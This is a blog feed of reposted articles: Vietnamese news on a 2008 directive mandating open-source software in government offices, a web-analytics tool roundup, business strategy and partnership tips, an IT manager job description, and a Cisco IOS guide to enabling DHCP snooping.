Có kế hoạch để từng bước nâng dần số văn bản, tài liệu, thông tin trao đổi trong các cơ quan, đơn vị thuộc Bộ, ngành, tỉnh, thành phố được soạn thảo, xử lý bằng các phần mềm nêu trên; đảm bảo đến ngày 31/12/2010 hầu hết cán bộ, nhân viên trong các cơ quan, đơn vị thuộc Bộ, ngành, tỉnh, thành phố sử dụng các phần mềm nêu trên trong công việc.

Tham mưu, đề xuất với Thủ trưởng cơ quan Bộ, ngành, Chủ tịch Ủy ban nhân dân tỉnh, thành phố: các giải pháp, biện pháp để đảm bảo thực hiện được các nhiệm vụ nêu trên; lồng ghép, đưa các nội dung của Chỉ thị này vào kế hoạch ứng dụng CNTT của các cơ quan, đơn vị; tuyên truyền, vận động, khuyến khích phong trào thi đua giữa các cơ quan, đơn vị, cá nhân trong Bộ, ngành, tỉnh, thành phố về việc sử dụng PMNM; đưa việc ứng dụng CNTT nói chung và sử dụng PMNM nói riêng vào nội dung bình xét thi đua, khen thưởng hàng năm của các cá nhân, đơn vị.

Với các hiệp hội và doanh nghiệp CNTT sẽ phải tổ chức các hoạt động thiết thực, tạo điều kiện cho các thành viên trao đổi thông tin, kinh nghiệm để không ngừng nâng cao năng lực khai thác, cung cấp sản phẩm, dịch vụ PMNM; phối hợp, hỗ trợ các đơn vị chuyên trách về CNTT, các Sở TT&TT thực hiện nhiệm vụ nêu trên; hỗ trợ phát triển các cộng đồng PMNM của Việt Nam; thúc đẩy hợp tác quốc tế về PMNM và các hoạt động liên kết giữa cộng đồng PMNM Việt Nam với các tổ chức, cộng đồng PMNM thế giới.

Các doanh nghiệp cung cấp máy tính phải cài đặt các phần mềm nêu trên vào các máy tính khi cung cấp cho các cơ quan, tổ chức nhà nước; Không được cung cấp ra thị trường các máy tính với những phần mềm không có bản quyền hợp pháp.

Các cơ sở, doanh nghiệp cung cấp dịch vụ đào tạo CNTT tích cực, chủ động xây dựng các chương trình, giáo trình và tổ chức các khoá đào tạo về PMNM; đưa nội dung đào tạo sử dụng các sản phẩm PMNM vào các chương trình đào tạo về tin học cơ bản, tin học văn phòng, tin học nâng cao.

Các doanh nghiệp phần mềm, các doanh nghiệp cung cấp dịch vụ CNTT nâng cao năng lực cung cấp dịch vụ phần mềm nói chung và PMNM nói riêng cho các cơ quan nhà nước theo hướng coi phần mềm như là dịch vụ (SaaS); khuyến khích phát triển các ý tưởng, sản phẩm, dịch vụ dựa trên PMNM.

Trong nội bộ các cơ quan đơn vị thuộc Bộ Thông tin và Truyền thông cũng phải thực hiện những đầu việc cụ thể như Vụ Công nghệ thông tin chủ trì, phối hợp với Văn phòng CNTT thuộc Bộ Khoa học và Công nghệ và các đơn vị liên quan cập nhật danh mục các PMNM đáp ứng yêu cầu sử dụng trong các cơ quan, tổ chức nhà nước; Hoàn thiện các tài liệu hướng dẫn sử dụng; Tổ chức, hỗ trợ cộng đồng thực hiện Việt hoá các sản phẩm PMNM; Điều tra, khảo sát, tổng hợp và cung cấp lên mạng: danh sách, địa chỉ các doanh nghiệp cung cấp dịch vụ PMNM, các cơ sở, doanh nghiệp cung cấp dịch vụ đào tạo về PMNM; các phiên bản cài đặt, tài liệu kỹ thuật, hướng dẫn sử dụng các PMNM thông dụng; Hướng dẫn, kiểm tra, đôn đốc việc thực hiện Chỉ thị; tiếp nhận, tổng hợp phối hợp với các cơ quan, đơn vị có liên quan giải quyết theo thẩm quyền, hoặc báo cáo Bộ trưởng giải quyết các kiến nghị, đề xuất của các Bộ, ngành, địa phương về ứng dụng và phát triển PMNM, cũng như những vướng mắc phát sinh trong quá trình triển khai Chỉ thị; tổng hợp báo cáo Bộ trưởng kết quả việc thực hiện.

Cục Ứng dụng Công nghệ thông tin chủ động lồng ghép, đưa các nội dung của Chỉ thị này, cũng như các nội dung, nhiệm vụ thúc đẩy ứng dụng PMNM nói chung, vào trong các văn bản quy định, hướng dẫn về ứng dụng CNTT, các văn bản hướng dẫn xây dựng kế hoạch, chương trình, dự án ứng dụng CNTT trong hoạt động của cơ quan nhà nước.

Viện Công nghiệp phần mềm và nội dung số Việt Nam, Trung tâm Ứng cứu khẩn cấp máy tính Việt Nam (VNCERT): Chuẩn bị lực lượng sẵn sàng hỗ trợ các Bộ, ngành, địa phương triển khai sử dụng các PMNM nêu trên; Phối hợp với Vụ CNTT xem xét, cập nhật Danh mục các PMNM đáp ứng được yêu cầu sử dụng trong các cơ quan, tổ chức nhà nước.

Được biết, thực hiện Quyết định số 235/2004/QĐ-TTg ngày 02 tháng 3 năm 2004 của Thủ tướng Chính phủ phê duyệt Dự án tổng thể về Ứng dụng và phát triển phần mềm nguồn mở ở Việt Nam giai đoạn 2004-2008, tới nay, Bộ Thông tin và Truyền thông đã ban hành Danh mục các sản phẩm phần mềm mã nguồn mở đáp ứng được yêu cầu sử dụng trong các cơ quan, tổ chức nhà nước (gồm các phần mềm: văn phòng OpenOffice, thư điện tử trên máy trạm Mozilla ThunderBird, trình duyệt web Mozilla FireFox và bộ gõ tiếng Việt Unikey); Bộ Khoa học và Công nghệ đã xây dựng tài liệu hướng dẫn sử dụng và tổ chức tập huấn các phần mềm này cho nhiều cơ quan, tổ chức nhà nước trên toàn quốc.

Thuỷ Nguyên

Url: http://www.vnmedia.vn/newsdetail.asp?NewsId=153413&CatId=35

Việt Nam sắp sử dụng phần mềm nguồn mở trên diện rộng

2009-01-05T22:21:00.000-08:00

Việt Nam sắp sử dụng phần mềm nguồn mở trên diện rộng

Cập nhật: Hôm qua, lúc 13:53 - Nguồn: VietNamNet.vn
Dưới đây là phiên bản cache tại địa chỉ http://vietnamnet.vn/cntt/2009/01/822176/

- Chỉ thị 07/2008 của Bộ trưởng Bộ TT&TT Lê Doãn Hợp vừa ban hành nêu rõ: Chậm nhất đến ngày 30/6/2009, đảm bảo 100% máy trạm của đơn vị chuyên trách về CNTT trong các cơ quan nhà nước sẽ phải cài đặt các phần mềm nguồn mở; 100% cán bộ được tập huấn, hướng dẫn sử dụng, trong đó tối thiểu 50% cán bộ có thể sử dụng thành thạo trong công việc...

Bộ trưởng Bộ TT&TT Lê Doãn Hợp yêu cầu, đến 30/6/2009, PMNM sẽ được sử dụng hoàn toàn trong các cơ quan Bộ, ngành, địa phương. (Ảnh: VNN)

Các đơn vị chuyên trách về CNTT trong các cơ quan nhà nước ở đây được xác định là các đơn vị thuộc các Bộ, cơ quan ngang Bộ, cơ quan thuộc Chính phủ và các Sở TT&TT của các tỉnh, thành phố trực thuộc Trung ương. Các phần mềm nguồn mở (PMNM) được đưa vào sử dụng bao gồm: các phần mềm văn phòng OpenOffice, thư điện tử trên máy trạm Mozilla ThunderBird, trình duyệt web Mozilla FireFox và bộ gõ tiếng Việt Unikey.

Ngoài việc sử dụng thành thạo PMNM trong công việc, 50% số cán bộ và nhân viên được xác định ở trên còn phải có khả năng hướng dẫn, trợ giúp các cơ quan, đơn vị khác thuộc Bộ, ngành, tỉnh, thành phố.

Chỉ thị cũng yêu cầu, chậm nhất đến ngày 31/12/2009, đảm bảo 70% máy trạm trong các cơ quan, đơn vị thuộc Bộ, ngành, tỉnh, thành phố được cài đặt, 70% cán bộ, nhân viên được tập huấn, hướng dẫn sử dụng, trong đó tối thiểu 40% cán bộ, nhân viên sử dụng các PMNM trong công việc. Đồng thời, các cơ quan cũng cần có kế hoạch để từng bước nâng dần số văn bản, tài liệu, thông tin trao đổi trong các cơ quan, đơn vị thuộc Bộ, ngành, tỉnh, thành phố được soạn thảo, xử lý bằng các PMNM nêu trên; đảm bảo đến ngày 31/12/2010 hầu hết cán bộ, nhân viên trong các cơ quan này đều có thể sử dụng PMNM trong công việc.

TIN LIÊN QUAN
Giải bài toán chi phí bản quyền bằng phần mềm nguồn mở Phần mềm nguồn mở... đã mở? Cơ hội chuyển sang phần mềm nguồn mở của Việt Nam? Cơ hội cho phần mềm nguồn mở? PMNM được ưu tiên trong đầu tư dùng vốn ngân sách

Bộ trưởng Lê Doãn Hợp nhấn mạnh, sau khi đã đưa PMNM vào sử dụng, các cơ quan cần có những kế hoạch tuyên truyền, khuyến khích phong trào thi đua giữa các đơn vị, cá nhân trong Bộ, ngành, tỉnh, thành phố... về việc ứng dụng CNTT nói chung và sử dụng PMNM nói riêng vào nội dung bình xét thi đua, khen thưởng hàng năm của mình. Định kỳ (ít nhất 6 tháng một lần) có thể tổ chức đánh giá và rút kinh nghiệm.

Nhiệm vụ của các hiệp hội và doanh nghiệp CNTT đối với việc triển khai, đưa PMNM vào sử dụng diện rộng trong cả nước được xác định là rất quan trọng. Chỉ thị của Bộ trưởng Bộ TT&TT yêu cầu các hiệp hội CNTT cần tổ chức các hoạt động thiết thực, tạo điều kiện cho các thành viên trao đổi thông tin, kinh nghiệm để không ngừng nâng cao năng lực khai thác, cung cấp sản phẩm, dịch vụ PMNM. Ngoài ra, các hiệp hội cũng có thể phối hợp với các đơn vị chuyên trách về CNTT và các Sở TT&TT, hỗ trợ phát triển các cộng đồng PMNM của Việt Nam, thúc đẩy hợp tác quốc tế về PMNM và các hoạt động liên kết giữa cộng đồng PMNM Việt Nam với các tổ chức, cộng đồng PMNM thế giới.

Chỉ thị 07 cũng có một yêu cầu rõ với các DN cung cấp máy tính là: khi bán máy tính ra thị trường, không được cài đặt sẵn vào máy tính những phần mềm không có bản quyền hợp pháp mà có thể sử dụng ngầm định các PMNM.

H.C

url:http://www.tin247.com/viet_nam_sap_su_dung_phan_mem_nguon_mo_tren_dien_rong-4-21365609.html

10 công cụ phân tích Web miễn phí và hiệu quả

2009-01-05T22:14:00.000-08:00

10 công cụ phân tích Web miễn phí và hiệu quả

(VnMedia) - Phân tích web là việc xử lý các dữ liệu thu thập được từ nội dung trang web để cung cấp cho các nhà quản trị web những thông tin hữu ích cũng như việc kiểm soát và giám sát trang web nhằm ngăn chặn việc tấn công của những kẻ lạ mặt.

Dưới đây là 10 công cụ miễn phí và tuyệt vời sẽ giúp tập hợp và phân tích dữ liệu cho website của chính mình.

1. Piwik

Piwik là một ứng dụng phân tích Web sử dụng mã nguồn mở dựa trên ngôn ngữ PHP và MySQL. Ứng dụng là một dạng “plugins” được gắn thêm vào hệ thống. Piwik cung cấp cho người dùng các báo cáo chi tiết về số lượng người ghé thăm website, các công cụ tìm kiếm và các từ khóa mà họ đã sử dụng cũng như các trang mà người dùng thường ghé thăm,… Người dùng có thể tải Piwik về và cải đặt trên chính server chứa trang web. Việc cài đặt chỉ mất vài phút và sẽ xuất ra một đoạn code dạng JavaScript. Người dùng chỉ cần copy và dán đoạn code đó vào trong website cần phần tích.

Bản dùng thử có dung lượng 1,9MB và có thể tải về tại đây.

2. FireStats

FireStats là ứng dụng phân tích Web đơn giản và trung thực được viết trên ngôn ngữ PHP/MySQL. FireStats hỗ trợ các trang web viết trên nhiều ngôn ngữ khác nhau như C#, trang Django, Drupal, Joomla, WordPress,… Người dùng có thể lựa chọn một số tính năng cụ thể trên FireStats để phân tích Website và có thể tải về dùng thử tại đây.

3. Snoop

Snoop là ứng dụng chạy trên desktop máy tính và tương thích với hệ điều hành Mac OS X và Windows XP/Vista. Sau khi cài đặt, Snoop sẽ nằm trên khay hệ thống hoặc thanh trạng thái nhưng người dùng phải cài đặt driver âm thanh cho máy trước. Tính năng nổi bật khác của Snoop mang tên Name Tags cho phép người dùng dễ dàng nhận diện những vị khách viếng thăm website hơn.

Người dùng có thể tải phiên bản dùng cho máy Mac hoặc máy PC.

4. Yahoo! Web Analytics

Công cụ phân tích Web dành cho doanh nghiệp. Với các công cụ quản lý mạnh và linh hoạt, Yahoo! Web Analytics giúp các nhà quảng cáo trực tiếp và thiết kế Website nắm bắt được kinh nghiệm, thói quen người dùng nhằm tăng lượng giao dịch trong khi lại giảm giá thành. Ngoài ra, điểm đặc biệt của Yahoo! Web analytics là khả năng giám sát hoạt động trên Website với thời gian thực.

5. BBClone

Nếu bạn đang tìm kiếm một ứng dụng web dành cho máy chủ để giám sát dữ liệu của bạn một cách hoàn toàn đơn giản thì có thể tin tưởng vào BBClone. BBClone ứng dụng viết bằng ngôn ngữ PHP sẽ cung cấp các thông tin tổng quá về lưu lượng website và dữ liệu của các vị khách viếng thăm. Ứng dụng hỗ trợ 32 ngôn ngữ như Anh, Trung, Đức, Nhật,… BBClone dễ dàng tích hợp với các nền tảng phổ biến hiện nay như Drupal, WordPress và văn bản dạng Text. Việc phân tích sẽ dựa vào logfile ghi lại và không yêu cầu phải tác động vào cơ sở dữ liệu bên phía máy chủ.

6. Woopra

Woopra là một ứng dụng phân tích Web viết bằng ngôn ngữ Java, gồm hai phần: phần ứng dụng trên desktop để phân tích dữ liệu và phần dịch vụ web để giám sát các con số thống kê về website. Woopra là một hệ thống quản lý bằng trực giác, giao diện người sử dụng linh hoạt, dễ dùng cho phép người dùng hoạt động từ nhiều nơi và các vùng miền khác nhau. Ngay như đặc tính đồ họa cũng cung cấp vô số các thông tin cho biết vị khách viếng thăm website đến từ nơi nào trên thế giới. Woopra đang có phiên bản dùng thử và người sử dụng cần phải đăng ký thì mới có thể dùng thử phiên bản này.

7. JAWStats

JAWStats là ứng dụng phân tích Web trên máy chủ và cải thiện các tính năng của AWStats. JAWStats đã nâng cao tốc độ thực hiện bằng cách giảm việc sử dụng nguồn bên máy chủ và cải thiện giao diện người dùng (rõ ràng và dễ sử dụng hơn). JAWStats sẽ phân tích dữ liệu và đưa ra các thông tin dạng đồ họa, đồ thị và bảng về các vị khách viếng thăm website.

Người dùng có thể dùng thử trực tuyến hoặc tải bản JAWStats V0,6B

8. 4Q

Công cụ phân tích web với khối lượng dữ liệu rất lớn và chủ yếu dựa trên sự tương tác thực tế của người sử dụng với trang web.

9. MochiBot

Công cụ phân tích và lưu vết web miễn phí được thiết kế bằng Flash. Với MochiBot, người sử dụng sẽ biết ai đang chia sẻ nội dung Flash của bạn và nội dung đó được xem bao nhiêu lần cũng như giúp lưu vết để bảo vệ các nội dung cá nhân khỏi bị đánh cắp. Việc sử dụng rất đơn giản, người dùng chỉ việc cài đặt và copy đoạn code dạng ActionScript vào file Flash cần được giám sát.

10. Grape Web Statistics

Grape Web Statistics là ứng dụng phân tích Web nguồn mở đơn giản dành cho các nhà phát triển web với giao diện rõ ràng và dễ sử dụng.

Tuệ Minh - (Theo Sixrevisions)

url:http://www.tin247.com/10_cong_cu_phan_tich_web_mien_phi_va_hieu_qua-4-21365618.html

10 viên gạch xây nên chiến lược cạnh tranh của Michael Porter

2008-12-04T22:36:00.000-08:00

rong cuộc cạnh tranh khốc liệt hiện nay, các nhà quản lý phụ trách việc lập chiến lược của doanh nghiệp thường không có đủ hình dung thế nào là chiến lược và sự thành công của chiến lược thể hiện ở điểm nào. Theo Michael Porter – chuyên gia hàng đầu về chiến lược – có 10 yếu tố cơ bản để tạo nên một chiến lược thành công.

1. Đừng cố vươn tới mục tiêu trở thành đơn vị số một trên thị trường mà hãy là đơn vị độc nhất vô nhị.

Sai lầm cơ bản và tệ hại nhất của cách chiến lược gia là cạnh tranh với đối thủ trong cùng một “hốc tường”. Việc bắt chước hoạt động của đối thủ cạnh tranh chính là sai lầm từ khía cạnh chiến lược.

Mục tiêu của bạn – đừng cố trở thành công ty số một hoặc số hai trong lĩnh vực của mình mà hãy trở thành đơn vị độc nhất vô nhị với những sản phẩm/dịch vụ độc đáo cùng các bước tiếp thị xuất sắc.

2. Mục tiêu chính của bạn – tỷ suất lợi nhuận từ đầu tư (ROIC) cao

Đây là mục tiêu cơ bản nhất, còn sự tăng trưởng của công ty mới là mục tiêu thứ hai và chỉ nên thực hiện mục tiêu thứ hai sau khi đã hoàn thành mục tiêu cơ bản.

Sự tập trung vào các mục tiêu này (tăng thị phần, tăng doanh số…) sẽ tạo ra những rủi ro nội bộ nghiêm trọng đối với chiến lược của công ty.

4. Lĩnh vực họat động là nền tảng cho việc phân tích chiến lược

Hiệu quả kinh tế của công ty có được là từ hai yếu tố: cấu trúc ngành (đưa ra những quy tắc cạnh tranh chung) và cấu trúc vị trí của công ty trên thị trường (nguồn gốc lợi thế cạnh tranh). Chiến lược bao gồm hai yếu tố. Việc so sánh chỉ số ROIC của các công ty từ nhiều lĩnh vực khác đơn giản sẽ chẳng có ý nghĩa gì.

Ví dụ, ROIC của công ty dược phẩm Pharmacia&Upjohn trong giai đoạn từ 1985-2002 trung bình là 19.55%, trong khi chỉ số này cùng kỳ của Southewest Airline chỉ 12.75%. Tuy nhiên, nếu nhìn vào chỉ số chung của ngành thì ROIC trong ngành công nghiệp dược phẩm là 28.14%, trong khi chì số này trong ngành công nghiệp hàng không lại thấp – 5.05%. Như vậy, việc tranh luận về sự thành công của doanh nghiệp trên thị trường nên được tiến hành theo vị trí và chỉ số của nó trong ngành.

3. Đừng ngại thỏa hiệp

Phần cơ bản của chiến lược – chọn lựa đúng khi hai vị trí chiến lược không tương hợp, nghĩa là phải xác định xem công ty nên thực hiện việc gì và không nên thực hiện việc gì.

Công ty Neutrogena Soap đã đạt được thành công trong năm 1990 khi lựa chọn lọai xà phòng mềm cho làn da nhạy cảm và dứt bỏ các loại sản phẩm tẩy rửa. Nhãn hiệu đã chiếm được vị trí hàng đầu dưới sự giới thiệu của các chuyên gia da liễu đồng thời chiếm được lòng tin của người tiêu dùng, bất chấp phân khúc thị trường cho sản phẩm này là tương đối hẹp. Tuy nhiên, sau đó, khi xây dựng lại chiến lược và tái định hướng vào sự tăng trưởng của côngt y cũng như việc xây dựng chiến lược quảng cáo đại chúng trên truyền hình với sự tham gia của các ngôi sao, công ty đã đánh mất lòng tin của người tiêu dùng và kết quả là thị phần của công ty đã không còn.

5. Chiến lược cần phải thành công trong từng mắt xích của chuỗi tạo dựng giá trị

Lợi thế cạnh tranh của doanh nghiệp không thể được tập trung vào một hoặc một số mắt xích của chuỗi tạo dựng giá trị.

Công ty Zara - từng chiếm được thị trường trong một thời gian ngắn – chính là một ví dụ điển hình của chiến lược thành công tại từng mắt xích của chuỗi tạo dựng giá trị. Zara tin vào việc thay đổi thường xuyên bộ sưu tập của mình – 15 lần/năm (trong khi các nhà sản xuất quần áo khác chỉ thay đổi bộ sưu tập của mình một lần trong một mùa). Hãng cũng tin rằng, sự khác biệt của họ chính là niềm tin vào xu hướng mốt với giá cả phải chăng, nguồn gốc hàng hóa phải là châu Âu thay vì Hồng Kông hoặc Trugn Quốc, vị trí cửa hàng phải là những nơi có nhiều người qua lại…Và Zara đã thành công. Đối thủ không thể bắt chước một trong nhiều mắt xích chiến lược của Zara.

6. Chiến lược phải bất biến và cố định

Sự bất biến trong chiến lược chính là điều đảm bảo cho sự ổn định của công ty. Không nên chiều theo nhu cầu của người tiêu dùng mà làm sai lệch chiến lược của công ty.

Việc thường xuyên tăng cường sự quan tâm tới đòi hỏi và cả sự than phiền của người tiêu dùng chính là mối đe dọa nghiêm trọng đối với sự thực thi trình tự chiếc lược mà doanh nghiệp đã lựa chọn.Đôi khi, bạn cũng nên khuyên khách hàng mua sản phẩm/dịch vụ của đối thủ cạnh tranh vì việc khiến cho một lớp khách hàng này không hài lòng với sản phẩm của bạn nhằm tạo ra sự thỏa mãn cho một lớp khách hàng khác ở mức độ cao hơn đôi khi được coi là một chiến lược tốt.

7. Phân khúc thị trường là phần quan trọng trong việc tạo dựng chiến lược

Bạn có thể lựa chọn bất cứ phân khúc người tiêu dùng nào, sản phẩm nào hay tạo động cơ mua sản phẩm hay dịch vụ, thậm chí nếu như phân khúc này có vẻ không đúng ngay từ cái nhìn ban đầu.

Điều cơ bản để khung phân khúc lựa chọn được rõ ràng và không xảy ra sự “xói mòn”, tất cả các mắt xích của chuỗi tạo dựng giá trị cần phải tương hợp với phân khúc này.

8. CEO không phải là người sử dụng chiến lược mà là động cơ của chiến lược

Vai trò người đứng đầu doanh nghiệp trong việc tạo dựng và thực thi chiến lược dẫn đến các chức năng sau:

* đặt ra các câu hỏi mà câu trả lời cần được thể hiện trong kế họach chiến lược.
* lựa chọn thành viên tham gia vào việc tạo dựng chiến lược.
* tham gia vào các giai đọan đầu tiên của việc phát triển chiến lược trong từng bộ phận kinh doanh của công ty.
* để HDQT của công ty biết các kế họach chiến lược cơ bản của công ty.
* thu hút các chuyên gia tư vấn bên ngoài công ty.

Cũng đừng quên rằng, chiến lược cần phải đụng chạm đến tất cả các thành viên tổ chức chứ không phải chỉ ban quản lý công ty. Nếu như nhân viên của công ty (bất cứ cấp nào) không tiếp nhận chiến lược đã lựa chọn thì điều này có nghĩa rằng, anh ta/cô ta KHÔNG THỂ tiếp tục làm việc trong tổ chức của bạn.

9. Chiến lược không phải là:

§ mục tiêu

§ tầm nhìn

§ tái cơ cấu

§ mua bán và sáp nhập

§ liên minh và hợp tác

§ công nghệ

§ đổi mới /cách tân

§ gia công bên ngoài (outsourcing)

§ đào tạo

10. Chiến lược là:

* đề xuất mang tính độc nhất vô nhị
* chuỗi tạo dựng giá trị khác biệt với đối thủ cạnh tranh
* thỏa hiệp rõ ràng và xác định việc gì cần làm, việc gì không
* tính bất biến trong định vị.

Nam Khánh dịch từ Mybiz - BwPortal VN

Never start a project unless all resources are available

2008-12-03T22:14:00.001-08:00

url: http://maratische.livejournal.com/102187.html

2008-12-03T22:11:00.000-08:00

Friday, February 03, 2006

Never start a project unless all the resources are available

his is one of my bitter experiences to have witnessed in my career. It's not only about the number of resources, but also their skill sets. Always commit the estimate, after you have evaluated the skill levels of the resources available. Concrete estimates come only after all the requirements are freezed up.

It should not happen that requirement that is given to you initially, is just a tip of the iceberg. Later on, you may find yourself trapped in a soup fighting over the new requirements and time, all the way throughout the project development. Especially, when you are also fully involved in coding, testing and management. This won't leave you with enough time to manage as well as solve the problems/hurdles.

Development is not the only factor that should be considered, but also the environment under which the work is to be carried out, plays an important role. Due to lack of office space in small companies I have seen developers being made to sit parallel to the marketing and call support departments. Core development requires peaceful atmosphere where developers can concentrate writing creative lines of code. Given the nature of job for marketing department, they are the people of interactive personality and are in the habit of sharing unwanted stuff whenever they find time between marketing calls. This may frequently interrupt the development process. It is not to blame them, but is the requirement of their job profile. I mean interactivity and not bugging the the developers :-).

One more aspect of environment is your software system environment. This is where you will initiate coding. Ensure that system environment is all setup to the satisfaction. If not, also provide the estimate for the same. posted by Nehal Shah at 8:36 AM

url:http://nehalshah.blogspot.com/2006/02/never-start-project-unless-all.html

6 yếu tố cần tránh khi hợp tác kinh doanh

2008-11-25T18:57:00.000-08:00

6 yếu tố cần tránh khi hợp tác kinh doanh
Cập nhật lúc: 15h 05.11.2008

Hợp tác giữa các công ty đã trở thành một phần quan trọng trong kinh doanh. Lý do thật đơn giản: đó là bổ sung kỹ năng cho nhau, chia sẻ công cụ, chi phí và ý tưởng để có thể hiện thực hóa một sáng kiến hay và các bên hợp tác sẽ cùng thu được lợi nhuận.

Nhưng cũng tương tự như một sự “hôn phối” giữa hai cá thể, bên trong mối quan hệ hợp tác thường có không ít rắc rối và thử thách liên quan đến vô số vấn đề như chi phí, thuê mướn nhân viên, chia sẻ lợi nhuận.

Vì thế, nếu đang nghĩ đến chuyện hợp tác cùng doanh nghiệp nào đó, bạn hãy cân nhắc đến những điều sau đây:

1. Không cân nhắc kỹ khi góp vốn

Bất cứ lúc nào nói đến việc phải sẻ chia một phần vốn của mình, như tiền bạc, nguyên liệu, thông tin và bất động sản, thì có nghĩa là bạn sẽ mất đi một phần khả năng nắm bắt sự nghiệp của mình.

Trong một thế giới hoàn hảo, người hợp tác cùng luôn có ý chí tốt, chính trực và không hề có ý tưởng chiếm đoạt phần tài sản ấy hay sử dụng chúng để kiếm tiền cho riêng mình, nhưng cuộc sống hiện nay không hoàn mỹ như thế.

Do đó, hãy luôn cẩn trọng, tính toán mọi chi phí hoạt động và lợi nhuận mà bạn chia sẻ theo một bản thỏa thuận hợp tác. Cũng đừng quên tạo ra một lối thoát dễ dàng cho mình nếu mọi chuyện trở nên không như ý muốn.

2. Hợp tác chỉ vì không đủ tiền thuê nhân công

Đây chính là liều thuốc giết chết sự hợp tác ngay khi mới bắt đầu. Hoàn cảnh thường rất quen thuộc: A có ý tưởng kinh doanh và B lại sở hữu kỹ năng kinh doanh, nhưng A không đủ khả năng thuê mướn B nên họ quyết định cùng chia sẻ công việc, chi phí và lợi nhuận.

Điều gì sẽ xảy ra nếu A và B cùng kết thúc mọi thứ trong tình trạng cả hai đối đầu với nhau và A chợt nhận ra rằng anh ta hoàn toàn lệ thuộc vào những điều lệ bắt buộc ghi trong hợp đồng hợp tác với B? Nếu bạn có được một ý tưởng và biết một ai đó có được một kỹ năng thì hãy thuê anh ta hoặc thực hiện một bản hợp đồng chấp thuận sự độc lập của mình.

3. Thiếu hợp đồng hợp tác

Trong sự hợp tác, mọi chi tiết và trách nhiệm đều phải được kê khai rõ ràng và viết ra giấy, và hợp thức hóa bằng hợp đồng có cả sự tham gia của luật sư hai bên. Bạn sẽ rất cần đến luật sư khi tình thế xấu đi.

4. Xem thường việc hợp tác hữu hạn

Một trong những nguyên nhân chính dẫn đến sự thất bại của hợp đồng hợp tác chính là việc hiểu nhầm về các điều lệ pháp lý mà các bên đặt ra cho nhau. Một điều đáng chú ý chính là chủ quan trong sự hợp tác hữu hạn, nghĩa là một bên không phải chịu trách nhiệm về những hành động hay bổn phận nào của bên kia. Hãy để luật sư xem xét kỹ vấn đề này trong bản thỏa thuận.

5. Thiếu hẳn một lối thoát

Trong bất kỳ thỏa thuận hợp tác nào, hãy xác định rõ các điều khoản cho phép bạn và đối tác có thể chấm dứt việc hợp tác hoặc những lựa chọn liên quan đến việc mua lại toàn bộ tài sản của đối tác. Đây thật sự là một công việc dễ dàng và minh bạch, cũng như không hề dính dáng đến sự thành công của việc kinh doanh chung.

IT Manager - job description

2008-11-10T18:19:00.000-08:00

Brief Description :

• Overall responsible for the Information Technology Management. • Other Responsibilities are: - Overall responsibility for the maximum uptime and utilization of IT systems - Project manage IT-related implementations - Manage and develop training plans for IT Team - Continuously review business processes with users to ensure that efficiency & quality of work are maximized through proper implementation of IT solutions.

Key Responsibilities :

 System and Project Management - To lead overall planning and selection of IT technical, infrastructure solutions & business applications. - To liaise with users to understand the business requirements and to source for the right solutions. - To lead in the evaluation and selection of IT solutions and strategic implementation partners. - To oversee planning, development and project management of IT projects.  IT Management - To prepare the annual IT Budget and Key Activities. - To ensure that the IT costs are well managed. - Provide timely reporting to management on IT project status and Service levels.  IT System Services & Operations - To work closely with NISAP Team in handling SAP related issues. - Work with Corporate IS in planning and implementation of local infrastructure & technical projects - Ensure minimal downtime in IT systems and proper backups are performed for critical systems. - Manage IT Helpdesk support and ensure that network and messaging system service levels are met. - Ensure environment has adequate security and protection in place such as virus mgmt, internet security mgmt, information security policies) - Vendor management of local contracts and service agreements  Business Process Review - To recommend alternatives of performing daily tasks to reduce redundancy & manual work through IT solutions. - To gather feedback from business users on their requirements for IT systems from time to time. - To work closely with NISAP Team to ensure SAP functionalities are being extended to enhance business processes. IT Staff Development - To assist in IT staff recruitment and definition of job roles & responsibilities. - To develop training & development plan and recommend appropriate training for IT staff - To develop the performance appraisal guidelines and KPI measurements for inclusion to Performance Contracts - To monitor overall performance of IT staff and provide direct assistance to team members in resolving work-related issues. - To coach IT staff in effective problem resolution and decision making process. - To motivate and supervise the IT staff to achieve the established key performance indicators.

Job Requirement:

IT technologies and devices are continual change therefore the jobholder needs to study and attend IT technology-training courses usually. http://www.vipdatabase.com/index.php?act=viewjob&jobid=4658&mn=2

Enable/Configure DHCP Snooping in Cisco Catalyst Switches (IOS)

2008-10-16T18:46:00.000-07:00

Enable/Configure DHCP Snooping in Cisco Catalyst Switches (IOS)

DHCP snooping is a DHCP security feature that provides security by filtering untrusted DHCP messages and by building and maintaining a DHCP snooping binding table. An untrusted DHCP message is a message that is received from outside the network or firewall causing denial of service attacks.

The DHCP snooping binding table contains the MAC address, IP address, lease time, binding type, VLAN number, and interface information that corresponds to the local untrusted interfaces of a switch. An untrusted interface is an interface that is configured to receive messages from outside the network or firewall. A trusted interface is an interface that is configured to receive only messages from within the network.

DHCP snooping can be enabled on the switch per vlan as it can intercept the DHCP messages at the layer2.

The following is a step by step procedure to enable and configure DHCP snooping in Cisco catalyst switches running Cisco IOS

Enable DHCP Snooping

ciscoswitch(config)# ip dhcp snooping

Enable DHCP Snooping on VLANs

DHCP snooping can be enabled on one or more VLANs or a range of VLANs

ciscoswitch(config)# ip dhcp snooping vlan number 100

The above enables dhcp snooping on VLAN 100

To enable on more VLANs

ciscoswitch(config)# ip dhcp snooping vlan number 10-15 100 110

where the DHCP snooping is enabled on VLAN 10-15, 100 and 110

Enable DHCP Option 82

This allows DHCP option 82 message insertions into the packets. Option 82 is the Relay Agent Information Option as described in RFC 3046

ciscoswitch(config)# ip dhcp snooping information option

Configure Trust Interface

Interface not explcicitly configured as a trust interface is treated as an untrusted interface.

ciscoswitch(config)# interface fa0/0

ciscoswitch(config-if)# ip dhcp snooping trust

DHCP Snooping Rate limiting (optional)

Rate limiting allows restricting the number of DHCP packets per second (pps) that an interface can receive

ciscoswitch(config-if)# ip dhcp snooping limit rate 202

Where "202" indicates that the interface can receive "202" messages per second

This should configure DHCP Snooping on Cisco IOS switches.

Display DHCP Snooping

ciscoswitch# show ip dhcp snooping
DHCP Snooping is configured on the following VLANs:
10-15 100 110
Insertion of option 82 information is enabled.
Interface Trusted Rate limit (pps)
——— ——- —————-
FastEthernet2/1 yes 10
FastEthernet2/2 yes none
FastEthernet3/1 no 20

Display DHCP Snooping Binding Table

ciscoswitch# show ip dhcp snooping binding
MacAddress IP Address Lease (seconds) Type VLAN Interface
———– ———– —————- —– —– ————
0000.0100.0201 10.0.0.1 1600 dynamic 100 FastEthernet2/1

Unable to delete Stale/Obsolete statc routes in Cisco IOS (Jul 03, 2008)
How to create VLAN Interfaces for InterVLAN Routing in Cisco IOS (Jul 01, 2008)
